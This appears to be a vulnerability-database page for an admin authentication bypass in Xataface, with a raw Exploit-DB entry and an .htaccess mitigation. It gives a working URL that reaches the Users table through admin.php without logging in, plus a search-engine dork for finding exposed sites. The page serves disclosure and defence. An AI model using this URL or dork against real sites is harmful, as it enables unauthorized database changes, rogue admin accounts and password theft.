Xataface Admin Auth Bypass Vulnerability

vendor:

Xataface

by:

Xinapse

8,8

CVSS

HIGH

Admin/database auth bypass vulnerability

N/A

CWE

Product Name: Xataface

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Xataface Admin Auth Bypass Vulnerability

With this exploit, an attacker can edit/delete/create records in the database, create new admin accounts and view all the users and passwords.

Mitigation:

Using .htaccess to restrict access to the admin page.

Source

Exploit-DB raw data:

=======================================================
Xataface Admin Auth Bypass Vulnerability
=======================================================
#[+] Discovered by : Xinapse
#[+] Site          : firewire-security.com
#[+] Email         : admin@firewire-security.com

=======================================================
=======================================================

#[+] Vulnerability : Admin/database auth bypass vulnerability
#[+] Software      : Xataface - open source GPL, PHP, Mysql database
software
#[+] Vendor        : http://xataface.com
#[+] Usage         :
http://www.site.com/admin.php?-action=view&-table=Users&-cursor=0&-skip=0&-limit=30&-mode=list


#[+] Alert         : Most of the sites i tried running this software are
vulnerable, only a few used .htaccess
#[+] Dork          :"powered by dataface" "powered by xataface"
#[+] Description   : With this i could edit/delete/create records in the
database, create new admin accounts and view all the users and passwords.




#[+] Greetz        :firewire-security team, b10h4z4rd, g3org3